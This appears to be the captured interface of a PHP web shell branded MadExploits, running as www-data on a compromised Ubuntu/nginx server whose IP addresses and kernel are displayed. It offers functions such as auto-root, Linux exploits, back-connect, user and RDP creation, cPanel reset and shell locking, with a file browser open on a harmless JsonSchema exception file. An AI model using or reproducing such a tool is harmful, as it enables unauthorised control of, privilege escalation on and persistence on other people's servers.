Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
php /
JsonSchema /
Exception /
[ HOME SHELL ]
Name
Size
Permission
Action
ExceptionInterface.php
73
B
-rw-r--r--
InvalidArgumentException.php
377
B
-rw-r--r--
InvalidConfigException.php
337
B
-rw-r--r--
InvalidSchemaException.php
334
B
-rw-r--r--
InvalidSchemaMediaTypeExceptio...
343
B
-rw-r--r--
InvalidSourceUriException.php
348
B
-rw-r--r--
JsonDecodingException.php
1.21
KB
-rw-r--r--
ResourceNotFoundException.php
340
B
-rw-r--r--
RuntimeException.php
353
B
-rw-r--r--
UnresolvableJsonPointerExcepti...
394
B
-rw-r--r--
UriResolverException.php
330
B
-rw-r--r--
ValidationException.php
281
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : JsonDecodingException.php
<?php /* * This file is part of the JsonSchema package. * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace JsonSchema\Exception; /** * Wrapper for the JsonDecodingException */ class JsonDecodingException extends RuntimeException { public function __construct($code = JSON_ERROR_NONE, \Exception $previous = null) { switch ($code) { case JSON_ERROR_DEPTH: $message = 'The maximum stack depth has been exceeded'; break; case JSON_ERROR_STATE_MISMATCH: $message = 'Invalid or malformed JSON'; break; case JSON_ERROR_CTRL_CHAR: $message = 'Control character error, possibly incorrectly encoded'; break; case JSON_ERROR_UTF8: $message = 'Malformed UTF-8 characters, possibly incorrectly encoded'; break; case JSON_ERROR_SYNTAX: $message = 'JSON syntax is malformed'; break; default: $message = 'Syntax error'; } parent::__construct($message, $code, $previous); } }
Close